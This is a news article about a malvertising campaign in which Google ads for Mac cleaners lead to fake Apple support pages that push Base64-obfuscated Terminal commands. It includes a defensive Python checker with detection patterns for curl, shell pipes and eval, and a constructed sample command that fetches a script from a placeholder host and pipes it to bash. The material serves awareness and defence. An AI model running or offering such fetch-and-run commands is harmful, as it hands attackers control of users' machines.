Mac users searching for cleanup or optimization software through Google need to be cautious — especially when ads appear at the top of the results. Researchers have recently uncovered a malicious campaign where dangerous ads are tricking people into running harmful commands on their machines.
What’s Happening?
Security researchers at MacKeeper discovered that certain sponsored Google search results — especially for keywords like “Mac cleaner” — aren’t leading to real cleanup tools. Instead, these ads send users to convincing yet fraudulent pages that look a lot like Apple’s official support pages.
These bogus pages are designed to fool users into thinking they’re legitimate troubleshooting guides — but they have a hidden goal: get you to run a harmful command in your Mac’s Terminal.
How the Scam Works
Here’s the step-by-step trick these attackers use:
- Trusted placement: The ads show up at the top of Google search results, which makes them look legitimate.
- Fake support pages: Clicking the ad takes you to pages styled to resemble Apple’s support documentation — even though they’re not real.
- Instructions to run Terminal commands: You’re shown instructions to copy-paste a command into macOS Terminal. The command is hidden using Base64 encoding so it doesn’t look suspicious at first glance.
- Malicious activity begins: When you run the command, it decodes into a script that’s downloaded and run with your full user permissions, giving attackers control of your Mac.
Fake messages like “Cleaning macOS Storage” appear while this is happening, tricking you into thinking the process is normal.
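One way to see what a copied command really does before it reaches Terminal, as an added example (not code from MacKeeper's research or this article): the Python script below decodes any Base64 hidden inside a pasted command without executing it and flags download-and-run patterns. The sample command, the placeholder URL and the heuristics are constructed for illustration and are not the campaign's actual indicators.

```python
import base64
import binascii
import re

# Runs of Base64 alphabet long enough to hide a shell command.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Assumed heuristics, not indicators published for this campaign.
RISKY = {
    "pipes into a shell": re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
    "fetches remote content": re.compile(r"\b(?:curl|wget)\b"),
    "decodes base64 inline": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"),
    "evaluates a string as code": re.compile(r"\beval\b"),
}


def decode_blobs(command):
    """Return readable text recovered from Base64 runs; nothing is executed."""
    decoded = []
    for blob in B64_RUN.findall(command):
        padded = blob + "=" * (-len(blob) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not Base64-encoded text, e.g. a long path or word
        if all(c.isprintable() or c in "\n\t" for c in text):
            decoded.append(text)
    return decoded


def inspect(command):
    """Return (decoded_payloads, sorted_findings) for a pasted command."""
    payloads = decode_blobs(command)
    findings = set()
    for layer in [command] + payloads:  # check the visible and hidden text
        for label, pattern in RISKY.items():
            if pattern.search(layer):
                findings.add(label)
    return payloads, sorted(findings)


# Constructed sample with the shape the article describes; placeholder URL.
HIDDEN = "curl -fsSL https://example.invalid/clean.sh | bash"
SAMPLE = 'echo "%s" | base64 -D | bash' % base64.b64encode(HIDDEN.encode()).decode()

if __name__ == "__main__":
    payloads, findings = inspect(SAMPLE)
    print("decoded:", payloads)
    print("findings:", findings)
```

Any finding on a command copied from a web page is a reason not to paste it into Terminal.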
What the Malware Can Do
Once the hidden script runs on your Mac, attackers can use it to:
- Steal sensitive files
- Extract SSH keys
- Install additional malware
- Hijack system resources for things like cryptomining
Because the script runs with full user permissions, it basically hands over control of your Mac to the attacker.
Who’s Behind These Ads?
The investigation found that some of the ads were served from genuine Google-verified advertising accounts, suggesting attackers may have compromised those accounts rather than creating fake ones from scratch.
For example:
- One ad came from a personal account under the name Nathaniel Josue Rodriguez
- Another used a small business account labeled Aloha Shirt Shop
Because both of these accounts previously ran ordinary ads, researchers think the attackers took them over to bypass Google’s trust checks and reach more victims.
MacKeeper has reported the abusive ads to Google to try to get them taken down.
Bottom Line
If you’re a Mac user searching for tools online, be extra cautious with sponsored ads — especially those promising cleanup or optimization solutions. Don’t trust everything at the top of the search results, and never run a Terminal command copied from a webpage you don’t fully trust.
